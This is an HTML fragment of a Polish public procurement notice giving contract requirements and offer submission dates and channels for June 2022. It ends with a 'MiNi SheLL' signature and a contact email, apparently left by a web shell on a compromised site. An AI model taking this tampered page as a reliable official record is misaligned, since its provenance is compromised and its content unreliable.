SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-07 14:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-07 14:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com